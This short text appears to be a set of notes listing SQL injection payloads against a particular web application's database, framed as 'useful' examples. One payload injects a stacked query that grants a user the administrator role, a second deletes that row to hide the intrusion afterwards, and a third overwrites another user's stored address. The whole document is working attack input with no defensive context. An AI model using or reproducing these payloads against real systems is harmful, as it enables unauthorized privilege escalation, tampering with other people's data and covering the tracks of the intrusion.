Useful example to escalate privileges:



Update rights of a user by injecting this:
----------------------------------------------

x';insert into app_role(username,rolename)values('test','administrator');select null,null,null,null,null,null,null,null,null from information_schema.columns where table_schema='PUBLIC' --






... and remove the breach after exploiting it:
----------------------------------------------

x';delete from app_role where username='test' and rolename='administrator';select null,null,null,null,null,null,null,null,null from information_schema.columns where table_schema='PUBLIC' --





















============

Less useful example (just writing some other data):

Lars';UPDATE runner SET street='test12345' WHERE upper(username)='ZZZ';SELECT id,username,firstname,lastname,street,zip,city,date_of_birth,photo_name FROM runner--
